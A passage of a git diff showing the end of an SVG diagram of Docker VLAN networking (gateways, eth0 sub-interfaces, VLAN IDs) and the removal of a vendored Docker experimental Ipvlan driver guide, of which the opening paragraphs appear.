fill="rgb(0,0,0)" stroke="none" x="69" y="0" width="51" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="69" y="12">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="82" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="86" y="12">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="92" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="96" y="12">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="109" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="112" y="12">1</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="137" height="28" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="2" y="14" width="4" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="5" y="14" width="58" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="9" y="26">and</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="32" y="26">other</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="63" y="14" width="129" height="28" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="63" y="26">containers</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="122" y="26">on</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="7" y="40">the</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="27" y="40">same</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="59" y="40">VLAN</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="91" y="40">/</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="94" y="28" width="37" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="94" y="40">subnet</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="42" width="137" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="67" y="42" width="5" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g/></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,98.9019607843137,163.00000000000003)"><g><g transform="translate(0,0) scale(0.3709803921568625,0.18000000000000005)"><g><path fill="#4cacf5" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.6955602536997905,5.5555555555555545)"><path fill="none" stroke="none" d="M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z"/><path fill="none" stroke="#666666" d="M 0 0 M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,94.48549019607844,159.15384615384616)"><g><g transform="translate(0,0) scale(0.3709803921568625,0.18000000000000005)"><g><path fill="#4cacf5" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.6955602536997905,5.5555555555555545)"><path fill="none" stroke="none" d="M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z"/><path fill="none" stroke="#666666" d="M 0 0 M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,89,154.00000000000003)"><g><g transform="translate(0,0) scale(0.3709803921568625,0.18000000000000005)"><g><path fill="#4cacf5" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.6955602536997905,5.5555555555555545)"><path fill="none" stroke="none" d="M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z"/><path fill="none" stroke="#666666" d="M 0 0 M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,345.51767083236393,86.4615119485293)"><g><g transform="translate(0,0) scale(1.7520258247164675,1.25824690354917) translate(0.00001348378,-0.001498589)"><g><g><path fill="#FFFFFF" stroke="#cc0000" d="M 33.84 5.912 C 16.263 2.403 6.986 11.405 8.451 19.186 L 8.57 19.61 C -5.128 21.942 -1.537 38.106 5.033 38.106 L 5.679 38.085 C 4.026 45.68 20.032 53.41 28.958 49.548 L 29.531 48.92 C 32.713 55.752 44.02 56.893 55.201 57.177 C 64.89 57.425 70.546 56.658 74.702 52.411 L 75.341 52.599 C 90.852 53.845 97.915 43.133 94.526 35.442 L 95.36 35.207 C 100.648 33.808 101.258 21.602 92.187 19.797 L 92.361 19.325 C 96.299 11.385 87.011 3.896 74.124 5.303 L 73.23 4.837 C 64.003 -3.517 37.449 -2.157 34.373 6.108 L 33.84 5.912 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="matrix(1,0,0,1,365,101)"><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="137" height="56" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="137" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="18" y="0" width="51" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="18" y="12">Gateway</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="69" y="0" width="51" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="69" y="12">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="82" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="86" y="12">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="92" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="96" y="12">30</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="109" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="112" y="12">1</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="137" height="28" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="2" y="14" width="4" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="5" y="14" width="58" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="9" y="26">and</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="32" y="26">other</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="63" y="14" width="129" height="28" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="63" y="26">containers</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="122" y="26">on</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="7" y="40">the</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="27" y="40">same</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="59" y="40">VLAN</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="91" y="40">/</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="94" y="28" width="37" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="94" y="40">subnet</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="42" width="137" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="67" y="42" width="5" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g/></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,451.9019607843137,158.00000000000003)"><g><g transform="translate(0,0) scale(0.3709803921568625,0.18000000000000005)"><g><path fill="#4cacf5" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.6955602536997905,5.5555555555555545)"><path fill="none" stroke="none" d="M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z"/><path fill="none" stroke="#666666" d="M 0 0 M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,447.48549019607844,154.15384615384616)"><g><g transform="translate(0,0) scale(0.3709803921568625,0.18000000000000005)"><g><path fill="#4cacf5" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.6955602536997905,5.5555555555555545)"><path fill="none" stroke="none" d="M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z"/><path fill="none" stroke="#666666" d="M 0 0 M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,442,149.00000000000003)"><g><g transform="translate(0,0) scale(0.3709803921568625,0.18000000000000005)"><g><path fill="#4cacf5" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.6955602536997905,5.5555555555555545)"><path fill="none" stroke="none" d="M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z"/><path fill="none" stroke="#666666" d="M 0 0 M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,47,331)"><g transform="translate(4,4) scale(1.0034722222222223,1.0083333333333333)"><g><g transform="translate(0,0) scale(1.44,0.6)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,1.6666666666666667)"><path fill="#000000" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.44,0.6)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,1.6666666666666667)"><path fill="#5fcc5a" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" opacity="0.99"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.99"/></g></g></g></g></g><g transform="matrix(1,0,0,1,50,342)"><g transform="translate(373,100) matrix(1,0,0,1,0,0) translate(-373,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="135" height="40" fill-opacity="0"/></g></g><g transform="translate(373,100) matrix(1,0,0,1,0,0) translate(-373,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="135" height="20" fill-opacity="0"/></g></g><g transform="translate(373,100) matrix(1,0,0,1,0,0) translate(-373,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="5" y="0" width="127" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="58" y="17">:</text></g><g transform="translate(373,100) matrix(1,0,0,1,0,0) translate(-373,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="5" y="0" width="54" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="5" y="17">Parent</text></g><g transform="translate(373,100) matrix(1,0,0,1,0,0) translate(-373,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="68" y="0" width="63" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="68" y="17">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="105" y="17">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="110" y="17">10</text></g><g transform="translate(373,100) matrix(1,0,0,1,0,0) translate(-373,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="20" width="135" height="20" fill-opacity="0"/></g></g><g transform="translate(373,100) matrix(1,0,0,1,0,0) translate(-373,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="17" y="20" width="71" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="17" y="37">VLAN</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="69" y="37">ID</text></g><g transform="translate(373,100) matrix(1,0,0,1,0,0) translate(-373,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="87" y="20" width="6" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="87" y="37">:</text></g><g transform="translate(373,100) matrix(1,0,0,1,0,0) translate(-373,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="93" y="20" width="26" height="20" fill-opacity="0"/></g></g><g transform="translate(373,100) matrix(1,0,0,1,0,0) translate(-373,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="98" y="20" width="21" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="98" y="37">10</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,367,331)"><g transform="translate(4,4) scale(1.0034722222222223,1.0083333333333333)"><g><g transform="translate(0,0) scale(1.44,0.6)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,1.6666666666666667)"><path fill="#000000" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.44,0.6)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,1.6666666666666667)"><path fill="#eb6c6c" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" opacity="0.99"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.99"/></g></g></g></g></g><g transform="matrix(1,0,0,1,369,341)"><g transform="translate(194,100) matrix(1,0,0,1,0,0) translate(-194,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="138" height="40" fill-opacity="0"/></g></g><g transform="translate(194,100) matrix(1,0,0,1,0,0) translate(-194,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="138" height="20" fill-opacity="0"/></g></g><g transform="translate(194,100) matrix(1,0,0,1,0,0) translate(-194,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="4" y="0" width="132" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="9" y="17">Parent</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="62" y="17">:</text></g><g transform="translate(194,100) matrix(1,0,0,1,0,0) translate(-194,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="72" y="0" width="63" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="72" y="17">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="109" y="17">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="114" y="17">30</text></g><g transform="translate(194,100) matrix(1,0,0,1,0,0) translate(-194,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="20" width="138" height="20" fill-opacity="0"/></g></g><g transform="translate(194,100) matrix(1,0,0,1,0,0) translate(-194,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="30" y="20" width="78" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="30" y="37">VLAN</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="77" y="37">:</text></g><g transform="translate(194,100) matrix(1,0,0,1,0,0) translate(-194,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="88" y="20" width="21" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="88" y="37">30</text></g><g transform="translate(194,100) matrix(1,0,0,1,0,0) translate(-194,-100)"><g/></g></g><g transform="matrix(1,0,0,1,371,44)"><g transform="translate(266,48) matrix(1,0,0,1,0,0) translate(-266,-48)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="142" height="32" fill-opacity="0"/></g></g><g transform="translate(266,48) matrix(1,0,0,1,0,0) translate(-266,-48)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="142" height="16" fill-opacity="0"/></g></g><g transform="translate(266,48) matrix(1,0,0,1,0,0) translate(-266,-48)"><g><rect fill="rgb(0,0,0)" stroke="none" x="17" y="0" width="75" height="16" fill-opacity="0"/></g></g><g transform="translate(266,48) matrix(1,0,0,1,0,0) translate(-266,-48)"><g><rect fill="rgb(0,0,0)" stroke="none" x="17" y="0" width="75" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="17" y="14">Network</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="72" y="14"> &amp;&#160;</text></g><g transform="translate(266,48) matrix(1,0,0,1,0,0) translate(-266,-48)"><g><rect fill="rgb(0,0,0)" stroke="none" x="90" y="0" width="36" height="16" fill-opacity="0"/></g></g><g transform="translate(266,48) matrix(1,0,0,1,0,0) translate(-266,-48)"><g><rect fill="rgb(0,0,0)" stroke="none" x="90" y="0" width="36" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="90" y="14">other</text></g><g transform="translate(266,48) matrix(1,0,0,1,0,0) translate(-266,-48)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="16" width="142" height="16" fill-opacity="0"/></g></g><g transform="translate(266,48) matrix(1,0,0,1,0,0) translate(-266,-48)"><g><rect fill="rgb(0,0,0)" stroke="none" x="26" y="16" width="92" height="16" fill-opacity="0"/></g></g><g transform="translate(266,48) matrix(1,0,0,1,0,0) translate(-266,-48)"><g><rect fill="rgb(0,0,0)" stroke="none" x="26" y="16" width="92" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="26" y="30">Docker</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="77" y="30">Hosts</text></g></g></g></svg>
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/experimental/vlan-networks.md b/vendor/github.com/docker/docker/experimental/vlan-networks.md
deleted file mode 100644
index caec6d6c6b..0000000000
--- a/vendor/github.com/docker/docker/experimental/vlan-networks.md
+++ /dev/null
@@ -1,471 +0,0 @@
-# Ipvlan Network Driver
-
-### Getting Started
-
-The Ipvlan driver is currently in experimental mode in order to incubate Docker users use cases and vet the implementation to ensure a hardened, production ready driver in a future release. Libnetwork now gives users total control over both IPv4 and IPv6 addressing. The VLAN driver builds on top of that in giving operators complete control of layer 2 VLAN tagging and even Ipvlan L3 routing for users interested in underlay network integration. For overlay deployments that abstract away physical constraints see the [multi-host overlay ](https://docs.docker.com/engine/userguide/networking/get-started-overlay/) driver.
-
-Ipvlan is a new twist on the tried and true network virtualization technique. The Linux implementations are extremely lightweight because rather than using the traditional Linux bridge for isolation, they are simply associated to a Linux Ethernet interface or sub-interface to enforce separation between networks and connectivity to the physical network.
-
